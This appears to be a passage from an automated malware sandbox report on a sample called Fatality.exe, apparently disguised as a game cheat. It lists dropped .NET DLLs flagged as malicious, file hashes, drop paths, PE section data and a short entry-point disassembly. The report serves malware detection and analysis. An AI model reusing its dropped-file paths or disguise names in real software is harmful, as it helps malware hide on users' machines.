                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                    MD5:271D5F995996735B01672CF227C81C17
                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.136471148832945
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                    MD5:37B1FC046E4B29468721F797A2BB968D
                                    SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                    SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                    SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):0.8745947603342119
                                    Encrypted:false
                                    SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                    MD5:378391FDB591852E472D99DC4BF837DA
                                    SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                    SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                    SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.8508558324143882
                                    Encrypted:false
                                    SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                    MD5:933D6D14518371B212F36C3835794D75
                                    SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                    SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                    SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                    Malicious:false
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.483856189774723
                                    Encrypted:false
                                    SSDEEP:3:FZd6UM:FZgUM
                                    MD5:78C526AB0EDA28FA6E7F86F3686480CD
                                    SHA1:5F642C505F91359977C83DAEA43752D784BE18EF
                                    SHA-256:39AAC7C3BB81A988E38A142AEF8A8076720FF67F46173E8D0C5711C5A5D69F30
                                    SHA-512:6A70A563F22D947DDF82919813D44C634A25C4FE033E1F5DB80E26EA88F3EF605368248362C757EC8F88B4AD16B810D65C518FE5A5DF2CAB04A1294EBCD2B447
                                    Malicious:false
                                    Preview:HwuJaUp6PSrnbD5MlbPdg2F0G
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1239949490932863
                                    Encrypted:false
                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                    MD5:271D5F995996735B01672CF227C81C17
                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1224
                                    Entropy (8bit):4.435108676655666
                                    Encrypted:false
                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                    Malicious:false
                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.9936379394153056
                                    Encrypted:false
                                    SSDEEP:48:6ADprPt0qM7Jt8Bs3FJsdcV4MKe27JdcFvqBHOOulajfqXSfbNtm:PBPG3Pc+Vx9MoFvkocjRzNt
                                    MD5:E0C377614DF2282E2514CD8F13CB3033
                                    SHA1:0CD943F58F9283E072BEBB8EB20833CA46E67EAF
                                    SHA-256:E04DF35285E3F0A59F9CEC7A2086992C26423442C9D76659DF79B4CB1F5474F3
                                    SHA-512:19E4B61FB176644A01037BDEB533A6925AD33F8A90CA79477A5B31978B47E680733A4E008DABD3AE1EE3FBB0B2CC55127961948F6DE65D537A4090EADCD8C776
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Process:C:\Windows\System32\PING.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):502
                                    Entropy (8bit):4.630609828667227
                                    Encrypted:false
                                    SSDEEP:12:PRW5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:pQdUOAokItULVDv
                                    MD5:FAF2117F1A3B4F701E223DF5890958E7
                                    SHA1:BDE718A7349579D70F1AD26BE34E30DB83B6B905
                                    SHA-256:6927C90DBAEAED90DC8FBD46C43097F5EAB5AEA5A3C0BEFD4E5613C1C10280C3
                                    SHA-512:D20170DB924BF0167C03F0E0D2F5B6869A548E1B07A2E3AF0EC9BF94895B9425F82BE5001BBF785EEF60263FB59CEDD880BBA03316443826F3FD40A425C25FCB
                                    Malicious:false
                                    Preview:..Pinging 238576 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.658102585626772
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Fatality.exe
                                    File size:3'517'117 bytes
                                    MD5:a5a9cde94b59bc5b8b88d60fc28177d3
                                    SHA1:aba15bc72cdeb915369b481926676f0a452d6dcc
                                    SHA256:4ddd25095cce5dadc01782611513331e9fb1e37746adc5501a5b27c2b7aecfa6
                                    SHA512:31b3a40e94319011702b680ec2623ab8132928dade90694027c471dc11304251f2880ee151ce1e42cc1da2880bb03b279bbcb617b9c723fe776ba35d13a1bb62
                                    SSDEEP:98304:gWHg7lN8JPnn6JckFDpcistUDpLfZpkSvbE:gVlkEpfsqlYeo
                                    TLSH:ACF5CE05A5D14EFEC2634AF3416E073D52919E2E6531EB0F378E31D66A376B08B621B3
                                    Icon Hash:32f8cc6971703121
                                    Entrypoint:0x417172
                                    Entrypoint Section:
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:d89f3dcdac0c8dba11dc1162435bedbb
                                    Instruction
                                    call 00007FAB5926FF46h
                                    jmp 00007FAB5926FD5Eh
                                    push 0044BB60h
                                    push dword ptr fs:[00000000h]
                                    mov eax, dword ptr [esp+10h]
                                    mov dword ptr [esp+10h], ebp
                                    lea ebp, dword ptr [esp+10h]
                                    sub esp, eax
                                    push ebx
                                    push esi
                                    push edi
                                    mov eax, dword ptr [00466ECCh]
                                    xor dword ptr [ebp-04h], eax
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-18h], esp
                                    push dword ptr [ebp-08h]
                                    mov eax, dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                    mov dword ptr [ebp-08h], eax
                                    lea eax, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    mov ecx, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], ecx
                                    pop ecx
                                    pop edi
                                    pop edi
                                    pop esi
                                    pop ebx
                                    mov esp, ebp
                                    pop ebp
                                    push ecx
                                    ret
                                    int3
                                    int3
                                    int3
                                    add esp, 04h
                                    jmp 00007FAB596ADD19h
                                    mov dh, 09h
                                    mov bh, 54h
                                    and ebx, esi
                                    enter 574Eh, E1h
                                    pop edx
                                    jnl 00007FAB5926FF57h
                                    dec esp
                                    mov edi, FF69B4A9h
                                    fcmove st(0), st(5)
                                    lodsb
                                    or dword ptr [edi-75B13E42h], ecx
                                    mov edx, B151199Eh
                                    xchg eax, ebx
                                    pop edx
                                    mov ebx, 123E1086h
                                    movsd
                                    inc ebx
                                    adc dword ptr [edx+ebp*2], FFFFFFDDh
                                    jnl 00007FAB5926FEA7h
                                    lds edx, fword ptr [eax-465D38AAh]
                                    mov ecx, 5A52710Dh
                                    mov edx, 9D1A440Dh
                                    sbb ebp, dword ptr [ebx+esi*4+54h]
                                    das
                                    jc 00007FAB5926FEF4h
                                    push ds
                                    jnl 0000FE8Ch
                                    sub al, 61h
                                    pop ss
                                    leave
                                    lodsb
                                    stc
                                    sub dh, byte ptr [ebx]
                                    out 03h, al
                                    mov esi, 000216DFh
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    | Name | Virtual Address | Virtual Size | Is in Section |
                                    | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x371020 | 0x34 | cheat |
                                    | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x371054 | 0x210 | cheat |
                                    | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x43d2c | .rsrc |
                                    | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x371000 | 0xc | cheat |
                                    | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
                                    | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
                                    | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                    |  | 0x1000 | 0x32000 | 0x1be00 | ba5b42c7670897607f3d2d0524658b40 | False | 0.9972848934977578 | data | 7.996936789356691 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x33000 | 0xb000 | 0x4800 | 059a7800974553e470fb1ccc9bba4f2f | False | 0.9947916666666666 | DOS executable (COM) | 7.977874239971029 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x3e000 | 0x25000 | 0x800 | adece09e33fd2b88c1b6d54c5e93890a | False | 0.91162109375 | data | 7.478628519160346 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x63000 | 0x1000 | 0x200 | 6d21bdb7b83703222752122111af3cb3 | False | 0.447265625 | data | 3.7577890770502353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0x64000 | 0x47000 | 0x2600 | 348b7326b7eb987cd0e4811e6a604583 | False | 0.9837582236842105 | data | 7.946335906125016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0xab000 | 0x3000 | 0x2000 | 62643a6822ccfeaf1a7770f81d11d870 | False | 0.9586181640625 | data | 7.85259808088101 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    | .rsrc | 0xae000 | 0x44000 | 0x43e00 | eb48ca90d4ec3120505afdcc40ff5f47 | False | 0.13265423572744015 | data | 3.1130938069043013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    |  | 0xf2000 | 0x27f000 | 0x2ba00 | 770f2e39817cfa2d569a17e7190e6266 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
